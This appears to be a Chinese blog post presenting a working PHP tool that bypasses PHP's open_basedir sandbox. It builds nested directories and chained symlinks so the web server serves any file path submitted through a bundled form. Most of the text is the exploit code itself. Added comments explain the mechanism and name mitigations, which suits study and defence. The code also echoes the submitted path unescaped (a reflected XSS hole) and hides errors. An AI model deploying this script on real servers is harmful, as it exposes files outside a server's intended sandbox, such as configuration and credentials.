bypass open_basedir


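在了解 symlink() bypass open_basedir 的原理后,自己写的代码。在 Kali Linux 上测试通过;Windows 下需要修改路径处理部分。脚本依赖 symlink() 可用,返回的只是指向符号链接的超链接,实际读取由 Web 服务器跟随该链接完成;在 disable_functions 中禁用 symlink(),或让 Web 服务器不跟随符号链接,这段代码就无法生效。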

<?php
/*
 * title: bypass open_basedir
 * auth: eT48
 * blog: http://blog.csdn.net/et48_sec
 *
 * Proof-of-concept page that uses symlink() to produce a web-reachable link
 * to a path outside the configured open_basedir. A POST carrying a `path`
 * field runs bypassdir() and prints an anchor pointing at the created
 * symlink; any other request renders the HTML form at the bottom of the file.
 *
 * NOTE(review), defensive reading of this file:
 *  - Everything is done with plain mkdir(), chdir(), symlink() and unlink()
 *    calls relative to getcwd(), so the script cannot do its job when
 *    symlink() is listed in disable_functions.
 *  - PHP never opens the target in this file; the result is only a hyperlink
 *    to the symlink, so the read is performed by whatever serves that URL.
 *    Presumably a web server configured not to follow symlinks (or to follow
 *    them only on owner match) refuses the request -- confirm per deployment.
 *  - Artifacts left in the working directory after a run: one symlink and
 *    one empty directory, each named with 6 characters from [A-Z0-9]. The
 *    symlink's stored target contains a run of "/.." segments followed by the
 *    requested path. The scratch tree itself is deleted before returning.
 */

// As written, the header name ("Conten-type") and the charset token
// ("charset:udf-8") are misspelled, so this is not a Content-Type header.
header("Conten-type:text/html; charset:udf-8");
// error_reporting(0) turns PHP error reporting off for the request and the
// @ operator silences the call below as well, so failed filesystem calls in
// this script are not reported.
error_reporting(0);
@clearstatcache();

/**
 * Builds a 6-character name from the alphabet A-Z and 0-9.
 *
 * The name is the first six entries of a shuffled copy of the alphabet, so
 * no character repeats within one name.
 *
 * @return string six-character name
 */
function randStr(){
    $arr = str_split('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789');
    shuffle($arr);
    $arr = array_slice($arr, 0, 6);
    $str = implode($arr);
    return $str;
}

/**
 * Recursively deletes a directory and everything below it.
 *
 * @param string $dir directory to remove
 * @return bool result of the final rmdir() on $dir
 */
function delTree($dir){
    // Drop the "." and ".." entries so the recursion stays inside $dir.
    $files = array_diff(scandir($dir), array('.','..'));
    foreach ($files as $file) {
        // Ternary used purely for its side effect: recurse into
        // sub-directories, unlink everything else.
        (is_dir("$dir/$file")) ? delTree("$dir/$file") : unlink("$dir/$file");
    }
    return rmdir($dir);
}

// Empty stub; nothing in the visible code calls it.
function check($filename){}

/**
 * Creates, in the current working directory, a symlink whose stored target
 * ends up resolving to $path, and returns an HTML anchor for that symlink.
 *
 * All work happens through relative mkdir()/chdir()/symlink() calls below
 * getcwd(). Directory depth is derived by counting '/' characters, so the
 * arithmetic assumes '/'-separated absolute paths.
 *
 * @param string $path absolute path supplied by the caller (here $_POST['path'])
 * @return string anchor markup linking to the new symlink; $path is inserted unescaped
 */
function bypassdir($path){
    // Path components; for a path starting with the separator element 0 is
    // empty, which is why the loops below start at index 1.
    $paths = explode(DIRECTORY_SEPARATOR,$path);
    $cwd = getcwd();
    // Number of '/' characters in the working directory, used as its depth.
    $num = preg_match_all('/\//',$cwd);
    $tempfn = randStr();
    $tempdir = "";
    $expstr = "";
    $templink = randStr();
    $explink = randStr();
    $res = "";
    // Scratch directory under the working directory.
    mkdir($tempfn);
    chdir($tempfn);
    // Inside the scratch directory, create a chain of real directories named
    // after the components of $path.
    for($i=1; $i<count($paths); $i++){
        mkdir($paths[$i]);
        chdir($paths[$i]);
    }
    // Climb back up to the scratch directory.
    for($i=1; $i<count($paths); $i++){
        chdir("..");
    }
    // Create $num+1 nested directories, each reusing the scratch name.
    for($i=1; $i<=$num+1; $i++){
        mkdir($tempfn);
        chdir($tempfn);
    }
    // Absolute path of the deepest nested directory.
    $tempdir = getcwd();
    // $num+1 nested levels plus the scratch directory itself: back to the
    // original working directory.
    for($i=1; $i<=$num+2; $i++){
        chdir("..");
    }
    // "/.." repeated $num+1 times.
    for($i=1; $i<=$num+1; $i++){
        $expstr .="/..";
    }
    // First link: $templink points at the deepest nested directory.
    symlink($tempdir,$templink);
    // Second link: the target is a relative path through $templink. While
    // $templink points into the scratch tree, the "/.." run lands on the
    // scratch directory, so the target resolves to the directory chain
    // created above, i.e. inside the working directory.
    // NOTE(review): presumably this is the resolution PHP's open_basedir
    // check sees -- PHP-internal behaviour, not visible in this file.
    symlink($templink.$expstr.$path,$explink);
    // Replace the first link with a real directory of the same name. The
    // stored target of $explink is unchanged, but the same "/.." run now
    // starts one level below the working directory and climbs $num+1 levels,
    // which by the depth count above is the filesystem root, so the target
    // resolves to $path itself.
    unlink($templink);
    mkdir($templink);
    // Remove the scratch tree. The symlink $explink and the empty directory
    // $templink stay behind in the working directory.
    delTree($tempfn);
    // $path goes into the markup without escaping.
    $res = "<a target='_blank' href='./".$explink."'>".$path."</a><br>";
    return $res;
}

$res= "";
// Request handler: `path` is taken straight from the POST body with no
// validation, used to build the symlink target and echoed back inside the
// anchor. The script stops here, so the form below is not rendered for POSTs.
if(!empty($_POST['path'])){
    $path = $_POST['path'];
    $res = bypassdir($path);
    echo $res;
    die();
}
// The rest of the file is the form page: it prints the active open_basedir
// value and the PHP version, and its client script posts the #path field as
// `path` via jQuery and appends the response to #output. jQuery is loaded
// over plain http from a third-party host.
?>
<html>
<head><title>open_basedir</title></head>
<body>
Titile: bypass open_basedir<br>
Auth: eT48<br>
 Blog: http://blog.csdn.net/et48_sec<br>
Open_basedir: <?php echo ini_get('open_basedir'); ?><br>
PHPVersion: <?php echo "PHP ".phpversion();?><br><br>
<form method='post'>path  <input id='path' type='text' style='width:450px'><input type='button' onclick='bypassdir()' value='submit' ></form>
<div id='output'></div>
<script src="http://www.w3school.com.cn/jquery/jquery-1.11.1.min.js"></script>
<script>
var targeturl = '<?php $_SERVER["REQUEST_URI"] ?>';
function send_post(targetdata,callback){
    $.ajax({url:targeturl,type:'POST',data:targetdata,dataType:'text',success:function(res){callback(res);},error:function(){}})
}
function bypassdir(){
    path = $('#path').val();
    if( path!=''){
        send_post({ path:path},function(res){ $('#output').append(res);})
    }
}
</script>
</body>
</html>
<?php die();?>


